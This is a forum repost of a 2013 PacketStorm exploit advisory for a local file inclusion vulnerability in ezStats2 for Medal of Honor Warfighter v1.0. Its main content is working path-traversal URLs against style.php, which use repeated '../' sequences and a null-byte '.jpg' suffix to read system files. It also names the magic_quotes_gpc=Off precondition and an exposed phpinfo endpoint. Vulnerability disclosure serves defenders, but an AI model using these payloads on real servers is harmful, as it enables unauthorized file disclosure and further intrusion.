Praetorian503 Posted February 6, 2013 Report Share Posted February 6, 2013 ezStats2 for Medal of Honor Warfighter version 1.0 suffers from a local file inclusion vulnerability.#################################################### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability### Date: 02/05/2013### Author: L0n3ly-H34rT### Contact: l0n3ly_h34rt@hotmail.com### My Site: http://se3c.blogspot.com/### Vendor Link: http://www.ezstats.org/### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip### Tested on: Linux/Windows #################################################http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpghttp://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg############################################# Notes :1- Must be magic_quotes_gpc = Off2- phpinfo() :http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info# Greetz to my friendzSource: PacketStorm Quote Link to comment Share on other sites More sharing options...